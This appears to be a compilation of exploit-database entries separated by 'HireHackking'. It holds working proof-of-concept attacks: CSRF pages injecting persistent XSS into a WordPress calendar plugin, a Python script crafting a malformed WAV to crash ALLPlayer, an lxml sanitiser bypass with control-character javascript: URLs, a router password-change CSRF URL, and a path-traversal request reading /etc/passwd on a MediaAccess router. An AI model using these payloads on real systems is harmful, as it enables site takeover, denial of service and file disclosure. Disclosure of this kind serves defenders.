================================
TECHNICAL DETAILS && DESCRIPTION
================================

Multiple privilege escalation were found in appointment-booking-calendar plugin that allows remote low level
and unauthenticated users to update calendar owners and options (allowing persistent XSS).

================
PROOF OF CONCEPT
================

Changing all appointment tables with UTF-8 charset, injecting persistent XSS into ´ict´ and ´ics´ options and setting
´CPABC_APPOINTMENTS_LOAD_SCRIPTS´ option to value ´1´.

<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://localhost:80/wordpress/wp-admin/admin.php?page=cpabc_appointments&ac=st&chs=UTF-8&ict=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&ics=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&scr=1", true);
        xhr.send();
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>


Updating calendar with id 1 and setting name with persistent XSS (if the shortcode [CPABC_APPOINTMENT_CALENDAR calendar="1"] 
is added in a post, the injected XSS will appear, in administration page appear too).

<html>
  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://localhost:80/wordpress/wp-admin/admin.php?page=cpabc_appointments&u=1&owner=5&name=%3C%2Foption%3E%3C%2Fselect%3E%3Cimg+src%3Dx+onerror%3Dalert%28%2Fjoaquin%2F%29%3E%3C", true);
        xhr.send();
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

==========
 CREDITS
==========

Vulnerability discovered by:
	Joaquin Ramirez Martinez [i0 security-lab]
	joaquin.ramirez.mtz.lab[at]yandex[dot]com
	https://www.facebook.com/I0-security-lab-524954460988147/
	https://www.youtube.com/user/strparser_lk


========
TIMELINE
========

2016-01-08 vulnerability discovered
2016-01-24 reported to vendor
HireHackking 
source: https://www.securityfocus.com/bid/67436/info

ALLPlayer is prone to a memory-corruption vulnerability.

An attacker can leverage this issue to crash the affected application, causing a denial-of-service condition. Due to the nature of this issue, arbitrary code execution may be possible but this has not been confirmed.

ALLPlayer 5.9 is vulnerable; other versions may also be affected. 

data
="\x52\x49\x46\x46\xE4\x0D\x0A\x09\x00\x57\x41\x56\x45\x66\x6D\x74\x20\x10\x00\x00\x00\x01\x00\x02\x00\x44\xAC\x00\x00\x10\xB1\x02\x00\x04\x00\x10\x00\x64\x61\x74\x61\xC0\x0D\x0A\x09\x00\x01\x00\x01\x00\x00\x00\x01\x00\x01\x00\x04\x00\x00\x00\x05\x00\x02\x00\x08\x00\x02\x00\x09\x00\x01\x00\x0D\x0A\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
outfile = file("poc.wav", 'wb')
outfile.write(data)
outfile.close()
print "Created Poc"
HireHackking 
source: https://www.securityfocus.com/bid/67159/info

lxml is prone to a security-bypass vulnerability.

An attacker can leverage this issue to bypass security restrictions and perform unauthorized actions. This may aid in further attacks.

Versions prior to lxml 3.3.5 are vulnerable. 

from lxml.html.clean import clean_html

html = '''\
<html>
<body>
<a href="javascript:alert(0)">
aaa</a>
<a href="javas\x01cript:alert(1)">bbb</a>
<a href="javas\x02cript:alert(1)">bbb</a>
<a href="javas\x03cript:alert(1)">bbb</a>
<a href="javas\x04cript:alert(1)">bbb</a>
<a href="javas\x05cript:alert(1)">bbb</a>
<a href="javas\x06cript:alert(1)">bbb</a>
<a href="javas\x07cript:alert(1)">bbb</a>
<a href="javas\x08cript:alert(1)">bbb</a>
<a href="javas\x09cript:alert(1)">bbb</a>
</body>
</html>'''

print clean_html(html)


Output:

<div>
<body>
<a href="">aaa</a>
<a href="javascript:alert(1)">
bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="">bbb</a>
</body>
</div>
HireHackking 
source: https://www.securityfocus.com/bid/67033/info

Comtrend CT-5361T ADSL Router is prone to a cross-site scripting vulnerability and a cross-site request-forgery vulnerability.

An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, add, delete or modify sensitive information, or perform unauthorized actions. Other attacks are also possible.

Comtrend CT-5361T firmware version A111-312SSG-T02_R01 is vulnerable; other versions may also be affected. 

http://www.example.com/password.cgi?sysPassword=[Your Password]
HireHackking 
Vulnerable hardware : MediaAccess TG788vn with Cisco http firewall
Author : Ahmed Sultan (0x4148)
Email : 0x4148@gmail.com

MediaAccess TG788vn with Cisco firewall http config is vulnerable to
critical unauthenticated file disclosure flaw,

POC

Request:
POST /scgi-bin/platform.cgi HTTP/1.1
Host: xx.xx.xx.xx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://xx.xx.xx.xx/scgi-bin/platform.cgi
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 164

button.login.home=Se%20connecter&Login.userAgent=0x4148_Fu&reload=0&SSLVPNUser.Password=0x4148Fu&SSLVPNUser.UserName=0x4148&thispage=../../../../../../etc/passwd%00

Response:
HTTP/1.0 200 OK
Date: Sat, 01 Jan 2011 00:00:45 GMT
Server: Embedded HTTP Server.
Connection: close

loic_ipsec:x:500:500:xauth:/:/bin/cli

the http server is running with root privileges , which mean that the
attacker might escalate the exploit for further critical attacks
HireHackking 
source: https://www.securityfocus.com/bid/67431/info

Intel Indeo Video is prone to a memory-corruption vulnerability.

Attackers can exploit this issue to crash the affected application, resulting in a denial-of-service condition. Due to the nature of this issue, arbitrary code execution may be possible but this has not been confirmed.

